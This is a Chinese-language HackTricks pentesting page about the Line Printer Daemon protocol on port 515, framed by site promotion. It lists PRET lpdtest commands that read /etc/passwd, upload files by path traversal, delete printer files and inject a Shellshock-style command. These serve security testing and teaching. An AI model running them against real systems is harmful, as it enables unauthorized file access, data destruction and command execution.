hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获取官方PEASS和HackTricks的衣物

• 加入 💬 Discord群组 或 电报群组 或 关注我在Twitter上的🐦@carlospolopm.

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

Line Printer Daemon (LPD)协议最初在80年代由伯克利Unix引入（后来由RFC1179指定）。
该守护程序运行在515/tcp端口上，可以使用lpr命令访问。要打印，客户端发送一个控制文件定义作业/用户名和一个包含要打印的实际数据的数据文件。数据文件的输入类型可以在控制文件中通过选择各种文件格式来设置。然而，如何处理打印数据实际上取决于LPD的实现方式。类Unix操作系统的一种流行的LPD实现是LPRng。LPD可以用作部署恶意PostScript或PJL打印作业的载体。

lpdprint和lpdtest工具包含在PRET中。它们是一种将数据直接打印到支持LPD的打印机或下载/上传/删除文件等的简约方式：

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

如果你想了解更多关于黑客攻击打印机的内容，请阅读此页面。

Shodan

• 端口 515

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord 群组 或 Telegram 群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks 仓库和hacktricks-cloud 仓库提交 PR 来分享你的黑客技巧。